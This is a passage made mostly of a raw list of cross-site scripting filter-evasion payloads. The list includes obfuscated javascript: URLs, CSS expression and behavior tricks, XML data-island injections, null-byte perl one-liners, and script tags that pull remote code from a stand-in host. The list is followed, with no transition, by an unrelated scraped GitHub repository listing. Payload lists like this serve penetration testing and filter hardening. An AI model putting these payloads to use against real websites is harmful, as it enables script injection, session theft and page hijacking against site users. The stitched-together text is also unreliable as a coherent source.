TYPE="text/javascript">alert('XSS');</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> <XSS STYLE="xss:expression(alert('XSS'))"> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://testsite.com/xss.css"> <STYLE>@import'http://testsite.com/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://testsite.com/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://testsite.com/xssmoz.xml#xss")}</STYLE> <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE> <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE> <HTML xmlns:xss> <?import namespace="xss" implementation="http://testsite.com/xss.htc"> <xss:xss>XSS</xss:xss> </HTML> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> <XML SRC="http://testsite.com/xsstest.xml" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]--> <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> <XSS STYLE="behavior: url(http://testsite.com/xss.htc);"> <SCRIPT SRC="http://testsite.com/xss.jpg"></SCRIPT> <BR SIZE="&{alert('XSS')}"> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert(&quot;XSS&quot;)> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> </TITLE><SCRIPT>alert("XSS");</SCRIPT> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav&#x09;ascript:alert('XSS');"> <IMG SRC="jav&#x0A;ascript:alert('XSS');"> <IMG SRC="jav&#x0D;ascript:alert('XSS');"> <IMG SRC = " j a v a s c r i p t : a l e r t ( ' X S S ' ) " > perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out <IMG SRC=" &#14; javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://testsite.com/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <SCRIPT SRC=http://testsite.com/xss.js <SCRIPT SRC=//testsite.com/.j> <IMG SRC="javascript:alert('XSS')" <IFRAME SRC=http://testsite.com/scriptlet.html < <<SCRIPT>alert("XSS");//<</SCRIPT> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <SCRIPT>a=/XSS/ alert(a.source)</SCRIPT> <P STYLE="behavior:url('#default#time2')" onEnd="alert('XSS')"> <SCRIPT a=">" SRC="http://testsite.com/xss.js"></SCRIPT> <SCRIPT ="blah" SRC="http://testsite.com/xss.js"></SCRIPT> <SCRIPT a="blah" '' SRC="http://testsite.com/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://testsite.com/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://testsite.com/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://testsite.com/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://testsite.com/xss.js"></SCRIPT>
tufteddeer
No description available
suntzar
No description available
NoxssY
Config files for my GitHub profile.
Team-Hydra-Hacking
NoXSS For Python 3
luqmaan1007-collab
No description available
vincentfer
No description available
yana0104
將抓包證書寫入模擬器的系統證書裡面
suntzar
No description available
suntzar
Um site de gerenciamento de alunos e documentos
suntzar
No description available
dilillo
No description available
Slike1337
canary
Slike1337
canary
canary
canary
All 20 repositories loaded